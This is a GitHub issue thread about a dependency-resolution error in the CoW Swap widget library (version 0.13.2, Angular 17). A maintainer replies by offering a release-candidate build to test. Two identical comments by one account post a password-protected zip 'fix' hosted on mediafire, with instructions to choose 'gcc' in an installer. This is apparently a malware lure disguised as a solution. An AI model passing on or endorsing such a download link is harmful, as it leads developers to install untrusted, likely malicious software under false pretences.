### ISSUE TITLE
Cow Swap Widget implementation error because dependencies not found

### ISSUE THREAD

**Issue by AlexFabra** [cowprotocol/cowswap#4833]
**Description**

When install the widget-lib and execute the code with the imports to create the element, it breaks the execution cause it not found internal dependencies.

**How to Reproduce**
1. install @cowprotocol/widget-lib with npm or pnpm
2. set this imports on a file :  { createCowSwapWidget, CowSwapWidgetParams } from '@cowprotocol/widget-lib' 
3. execute the application
4. See error: node_modules/.pnpm/@cowprotocol+widget-lib@0.13.2/node_modules/@cowprotocol/widget-lib/types.d.ts:1:65:
 ..., CowEventPayloadMap, CowEvents } from '../../events/src/index.ts';

**Additional context**
The widget-lib version is 0.13.2
I'm working on Angular 17
The current Cowswap documentation does not warn that other dependencies need to be installed for the widget to work: https://docs.cow.fi/cow-protocol/tutorials/widget#events-handling

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alfetopito** [comment]
Hey @AlexFabra, thanks a lot for reporting!

Do you mind trying the RC version I just published? https://www.npmjs.com/package/@cowprotocol/widget-lib/v/0.14.1-RC.0

Let me know whether it fixes the error for you.
